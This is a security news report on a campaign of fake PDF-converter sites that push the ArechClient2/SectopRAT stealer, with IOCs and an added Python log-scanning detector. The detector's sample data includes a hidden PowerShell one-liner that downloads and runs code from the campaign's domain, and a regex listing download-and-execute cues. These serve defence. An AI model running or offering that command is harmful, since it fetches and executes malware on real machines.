Security researchers at CloudSEK have uncovered a sophisticated malware campaign exploiting users’ need for PDF-to-Word conversion services.
Following an FBI alert, investigators identified several malicious websites closely impersonating the legitimate service pdfcandy.com, including candyxpdf[.]com and candyconverterpdf[.]com.
Sophisticated Phishing Campaign Targets Document Conversion Needs
The attack employs an elaborate social engineering strategy, presenting users with a convincing replica of the legitimate service’s interface.
Upon uploading a PDF for conversion, victims are shown a fake processing animation followed by a deceptive CAPTCHA verification prompt.
The infection begins when users are instructed to run a PowerShell command that is supposedly required to complete the conversion; nothing about the site itself exploits the browser, the victim executes the first stage by hand.
“This attack demonstrates remarkable attention to detail in mimicking trusted services,” explained CloudSEK’s research team.
“The visual elements and user flow are nearly identical to legitimate conversion tools, making detection challenging for average users.”
Technical Analysis Reveals ArechClient2 Malware
Technical analysis of the attack reveals a sophisticated multi-stage infection chain.

The PowerShell command connects to “bind-new-connect[.]click” through an obfuscated redirection chain and ultimately downloads a malicious “adobe.zip” archive.
The archive contains “audiobit.exe,” which uses the legitimate, Microsoft-signed MSBuild.exe build utility to deploy ArechClient2, a variant of the SectopRAT information stealer family. Because MSBuild.exe is a trusted Windows binary, controls that allow anything Microsoft-signed will not stop this step; the anomaly is the parent process and the location it launched from, not the binary.
SectopRAT has been active since 2019 and is notorious for harvesting sensitive data including browser credentials, cryptocurrency wallet information, and financial details from compromised systems.
Security experts recommend using only trusted file conversion tools from official websites, keeping security software up to date, and implementing technical controls such as DNS filtering and endpoint detection and response.
Users should be particularly wary of any online service that asks them to run a PowerShell command or presents an unusual CAPTCHA step during a document conversion; a web service never needs a locally executed command to convert a file.

“This campaign represents a concerning evolution in social engineering tactics,” noted the researchers.
“The attackers have clearly studied user behavior and expectations around document conversion services to create a highly convincing trap.”
Organizations are advised to educate users about these threats and implement strict policies regarding the use of online file conversion tools, particularly for handling sensitive documents.
Key indicators of compromise (IOCs) identified in the investigation include the domains candyxpdf[.]com, candyconverterpdf[.]com, and bind-new-connect[.]click, along with the IP address 172[.]86[.]115[.]43.
The malicious adobe.zip file (SHA-1: 72642E429546E5AB207633D3C6A7E2E70698EF65) and its executable payload audiobit.exe (SHA-256: 51de0b104e9ced3028a41d01dedf735809eb7f60888621027c7f00f0fcf9c834) should be flagged as high-risk indicators. File hashes identify only these specific samples and change with any rebuild, so the domains and the process behaviour described above are the more durable signals.
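As an added example (not code from CloudSEK or from the article), the following Python sweeps constructed DNS query lines and Sysmon-style process-creation records for the indicators listed above and for the two behaviours in the infection chain described earlier: a PowerShell instance spawned from explorer.exe that fetches remote content, and MSBuild.exe launched by a binary sitting in a user-writable directory. The log formats, the sample records, the placeholder digests and the exact PowerShell command line are assumptions constructed for the demonstration; only the three domains, the IP address and the two hashes come from the article.

```python
import re

# Indicators exactly as the article prints them (defanged).
IOC_DOMAINS = {"candyxpdf[.]com", "candyconverterpdf[.]com", "bind-new-connect[.]click"}
IOC_IPS = {"172[.]86[.]115[.]43"}
IOC_HASHES = {
    "72642E429546E5AB207633D3C6A7E2E70698EF65",                          # adobe.zip (40 hex chars: SHA-1)
    "51de0b104e9ced3028a41d01dedf735809eb7f60888621027c7f00f0fcf9c834",  # audiobit.exe (64 hex chars: SHA-256)
}


def refang(indicator: str) -> str:
    """Turn a defanged indicator ('example[.]com', 'hxxp://') back into matchable form."""
    return indicator.replace("[.]", ".").replace("hxxp", "http").lower()


DOMAINS = {refang(d) for d in IOC_DOMAINS}
IPS = {refang(i) for i in IOC_IPS}
HASHES = {h.lower() for h in IOC_HASHES}

# Paths a standard user can write to. MSBuild.exe is normally started by an IDE or build tool
# under Program Files; a parent living here matches the proxy-execution step in the article.
USER_WRITABLE = re.compile(r"\\(Users\\[^\\]+\\(Downloads|AppData|Desktop)|Temp|ProgramData)\\", re.I)
# Heuristic cues that a pasted one-liner fetches and runs remote content.
PS_DOWNLOAD_CUES = re.compile(
    r"\b(iwr|irm|iex|Invoke-WebRequest|Invoke-RestMethod|Invoke-Expression|DownloadString)\b", re.I)
HOST_TOKEN = re.compile(r"[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def domain_matches(name: str) -> bool:
    """True for an IOC domain or any subdomain of it (suffix match on a label boundary, so pdfcandy.com stays clean)."""
    n = name.lower().rstrip(".")
    return any(n == d or n.endswith("." + d) for d in DOMAINS)


def check_dns(lines):
    """Scan resolver log lines in the constructed form '<ts> <client> query: <name>'."""
    hits = []
    for line in lines:
        m = re.search(r"query:\s*(\S+)", line)
        if m and domain_matches(m.group(1)):
            hits.append(("ioc-domain", m.group(1)))
    return hits


def parse_hashes(field: str) -> set:
    """Sysmon 'SHA1=...,SHA256=...' field -> set of lowercase digests."""
    return {p.split("=", 1)[1].strip().lower() for p in field.split(",") if "=" in p}


def check_process(events):
    """Scan Sysmon-style process-creation records (dicts with Image, ParentImage, CommandLine, Hashes)."""
    hits = []
    for ev in events:
        image, parent, cmd = ev.get("Image", ""), ev.get("ParentImage", ""), ev.get("CommandLine", "")
        name = image.rsplit("\\", 1)[-1].lower()
        pname = parent.rsplit("\\", 1)[-1].lower()
        if parse_hashes(ev.get("Hashes", "")) & HASHES:
            hits.append(("ioc-hash", image))
        for token in HOST_TOKEN.findall(cmd):
            if domain_matches(token):
                hits.append(("ioc-domain-in-cmdline", token))
        if any(ip in cmd for ip in IPS):
            hits.append(("ioc-ip-in-cmdline", image))
        # Paste-and-run step: a shell started from the desktop (explorer.exe) that pulls remote code.
        if name == "powershell.exe" and pname == "explorer.exe" and PS_DOWNLOAD_CUES.search(cmd):
            hits.append(("explorer-spawned-powershell-download", cmd))
        # Proxy-execution step: MSBuild.exe launched by something dropped in a user-writable path.
        if name == "msbuild.exe" and USER_WRITABLE.search(parent):
            hits.append(("msbuild-from-user-writable-parent", parent))
    return hits


# Constructed sample input: one benign lookup, two IOC lookups.
SAMPLE_DNS = [
    "2025-04-10T12:00:01Z 10.0.0.5 query: www.pdfcandy.com",
    "2025-04-10T12:00:09Z 10.0.0.5 query: candyxpdf.com",
    "2025-04-10T12:01:30Z 10.0.0.5 query: bind-new-connect.click",
]
# Constructed sample input: a benign IDE build, then the three steps of the chain. The command
# line and the 0/1/2-filled digests are placeholders; only the audiobit.exe SHA-256 is real.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "CommandLine": "MSBuild.exe App.csproj", "Hashes": "SHA256=" + "0" * 64},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://bind-new-connect.click -UseBasicParsing | iex"',
     "Hashes": "SHA256=" + "1" * 64},
    {"Image": r"C:\Users\victim\Downloads\adobe\audiobit.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"C:\Users\victim\Downloads\adobe\audiobit.exe",
     "Hashes": "SHA256=51de0b104e9ced3028a41d01dedf735809eb7f60888621027c7f00f0fcf9c834"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "ParentImage": r"C:\Users\victim\Downloads\adobe\audiobit.exe",
     "CommandLine": "MSBuild.exe", "Hashes": "SHA256=" + "2" * 64},
]

if __name__ == "__main__":
    for hit in check_dns(SAMPLE_DNS) + check_process(SAMPLE_EVENTS):
        print(hit)
```

The two behavioural rules are deliberately independent of the published indicators: the legitimate devenv.exe-to-MSBuild.exe launch in the sample passes, while the same binary started from a Downloads folder is flagged, which is the check that survives the attackers rotating domains and rebuilding the payload.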